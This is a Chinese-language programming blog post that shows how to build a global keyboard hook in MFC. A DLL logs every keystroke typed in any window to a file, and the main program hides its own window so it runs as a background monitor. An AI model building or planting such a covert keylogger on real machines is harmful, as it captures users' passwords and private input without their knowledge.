一我們可以在應用程序中毫不費力的捕獲在本程序窗口上所進行的鍵盤操作,但如果我們想要將此程序作成一個監控程序,捕獲在Windows平臺下任意窗口上的鍵盤操作,就需要借助于全局鉤子來實現了。
二、系統鉤子和DLL
鉤子的本質是一段用以處理系統消息的程序,通過系統調用,將其掛入系統。鉤子的種類有很多,每種鉤子可以截獲并處理相應的消息,每當特定的消息發出,在到達目的窗口之前,鉤子程序先行截獲該消息、得到對此消息的控制權。此時在鉤子函數中就可以對截獲的消息進行加工處理,甚至可以強制結束消息的傳遞。
在本程序中我們需要捕獲在任意窗口上的鍵盤輸入,這就需要采用全局鉤子以便攔截整個系統的消息,而全局鉤子函數必須以DLL(動態連接庫)為載體進行封裝,VC6中有三種形式的MFC DLL可供選擇,即Regular statically linked to MFC DLL(標準靜態鏈接MFC DLL)、Regular using the shared MFC DLL(標準動態鏈接MFC DLL)以及Extension MFC DLL(擴展MFC DLL)。 在本程序中為方便起見采用了標準靜態連接MFC DLL。
三、鍵盤鉤子程序示例
本示例程序用到全局鉤子函數,程序分兩部分:可執行程序KeyHook和動態連接庫LaunchDLL。
1、首先編制MFC擴展動態連接庫LaunchDLL.dll:
(1)選擇MFC AppWizard(DLL)創建項目LaunchDLL;在接下來的選項中選擇Regular statically linked to MFC DLL(標準靜態鏈接MFC DLL)。
(2)在LaunchDLL.h中添加宏定義和待導出函數的聲明:
#define DllExport __declspec(dllexport)
……
DllExport void WINAPI InstallLaunchEv();
……
class CLaunchDLLApp : public CWinApp
{
public:
CLaunchDLLApp();
//{{AFX_VIRTUAL(CLaunchDLLApp)
//}}AFX_VIRTUAL
//{{AFX_MSG(CLaunchDLLApp)
// NOTE - the ClassWizard will add and remove member functions here.
// DO NOT EDIT what you see in these blocks of generated code !
//}}AFX_MSG
DECLARE_MESSAGE_MAP()
};
(3)在LaunchDLL.cpp中添加全局變量Hook和全局函數LauncherHook、SaveLog:
HHOOK Hook;
LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam);
void SaveLog(char* c);
(4)完成以上提到的這幾個函數的實現部分:
……
CLaunchDLLApp theApp;
……
DllExport void WINAPI InstallLaunchEv()
{
Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,
(HOOKPROC)LauncherHook,
theApp.m_hInstance,
0);
}
在此我們實現了Windows的系統鉤子的安裝,首先要調用SDK中的API函數SetWindowsHookEx來安裝這個鉤子函數,其原型是:
HHOOK SetWindowsHookEx(int idHook,
HOOKPROC lpfn,
HINSTANCE hMod,
DWORD dwThreadId);
其中,第一個參數指定鉤子的類型,常用的有WH_MOUSE、WH_KEYBOARD、WH_GETMESSAGE等,在此我們只關心鍵盤操作所以設定為WH_KEYBOARD;第二個參數標識鉤子函數的入口地址,當鉤子鉤到任何消息后便調用這個函數,即當不管系統的哪個窗口有鍵盤輸入馬上會引起LauncherHook的動作;第三個參數是鉤子函數所在模塊的句柄,我們可以很簡單的設定其為本應用程序的實例句柄;最后一個參數是鉤子相關函數的ID用以指定想讓鉤子去鉤哪個線程,為0時則攔截整個系統的消息,在本程序中鉤子需要為全局鉤子,故設定為0。
……
LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam)
{
LRESULT Result=CallNextHookEx(Hook,nCode,wParam,lParam);
if(nCode==HC_ACTION)
{
if(lParam & 0x80000000)
{
char c[1];
c[0]=wParam;
SaveLog(c);
}
}
return Result;
}
對其中的lParam & 0x80000000不理解,在網上搜索了一下,解釋是lParam的最高位為1代表鍵盤Up,0代表鍵盤down,最終我還是在msdn中找到了詳細解釋:
lParam的各位信息:

而Transition-state flag的詳細解釋如下:
Transition-State FlagThe transition-state flag indicates whether pressing a key or releasing a key generated the keystroke message. This flag is always set to 0 for WM_KEYDOWN and WM_SYSKEYDOWN messages; it is always set to 1 for WM_KEYUP and WM_SYSKEYUP messages.
關于更多信息,大家可以參考msdn的“About Keyboard Input”。
雖然調用CallNextHookEx()是可選的,但調用此函數的習慣是很值得推薦的;否則的話,其他安裝了鉤子的應用程序將不會接收到鉤子的通知而且還有可能產生不正確的結果,所以我們應盡量調用該函數除非絕對需要阻止其他程序獲取通知。 …… void SaveLog(char* c) { CTime tm=CTime::GetCurrentTime(); CString name; name.Format("c://Key_%d_%d.log",tm.GetMonth(),tm.GetDay()); CFile file; if(!file.Open(name,CFile::modeReadWrite)) { file.Open(name,CFile::modeCreate|CFile::modeReadWrite); } file.SeekToEnd(); file.Write(c,1); file.Close(); } 當有鍵彈起的時候就通過此函數將剛彈起的鍵保存到記錄文件中從而實現對鍵盤進行監控記錄的目的。 編譯完成便可得到運行時所需的鍵盤鉤子的動態連接庫LaunchDLL.dll和進行靜態鏈接時用到的LaunchDLL.lib。 2、下面開始編寫調用此動態連接庫的主程序,并實現最后的集成: (1)用MFC的AppWizard(EXE)創建項目KeyHook; (2)選擇單文檔,其余幾步可均為確省; (3)把LaunchDLL.h和LaunchDLL.lib復制到KeyHook工程目錄中,LaunchDLL.dll復制到Debug目錄下。 (4)鏈接DLL庫,即在"Project","Settings…"的"Link"屬性頁內,在"Object/librarymodules:"中填入"LaunchDLL.lib"。再通過"Project","Add To Project","Files…"將LaunchDLL.h添加到工程中來,最后在視類的源文件KeyHook.cpp中加入對其的引用: #include "LaunchDLL.h" 這樣我們就可以象使用本工程內的 函數一樣使用動態連接庫LaunchDLL.dll中的所有導出函數了。 (5)在視類中添加虛函數OnInitialUpdate(),并添加代碼完成對鍵盤鉤子的安裝: …… InstallLaunchEv(); …… (6)到此為止其實已經完成了所有的功能,但作為一個后臺監控軟件,運行時并不希望有界面,可以在應用程序類CkeyHookApp的InitInstance()函數中將m_pMainWnd->ShowWindow(SW_SHOW);改為m_pMainWnd->ShowWindow(SW_HIDE);即可。 四、運行與檢測 編譯運行程序,運行起來之后并無什么現象,但通過Alt+Ctrl+Del在關閉程序對話框內可以找到我們剛編寫完畢的程序"KeyHook",隨便在什么程序中通過鍵盤輸入字符,然后打開記錄文件,我們會發現:通過鍵盤鉤子,我們剛才輸入的字符都被記錄到記錄文件中了。 小結:系統鉤子具有相當強大的功能,通過這種技術可以對幾乎所有的Windows系統消息進行攔截、監視、處理。這種技術廣泛應用于各種自動監控系統中。
鉤子在使用完之后需要用UnHookWindowsHookEx()卸載,否則會造成麻煩。釋放鉤子比較簡單,UnHookWindowsHookEx()只有一個參數。函數原型如下:
1 UnHookWindowsHookEx
2 (
3 HHOOK hhk;
4 );
函數成功返回TRUE,否則返回FALSE。可以再LaunchDLL工程中增加卸載鉤子的函數如下:
DllExport void WINAPI UninstallLaunchEv()
{
if (Hook)
{
UnhookWindowsHookEx(Hook); //uninstall hook!!
Hook = NULL;
}
}
posted on 2012-11-22 14:46
王海光 閱讀(602)
評論(0) 編輯 收藏 引用 所屬分類:
MFC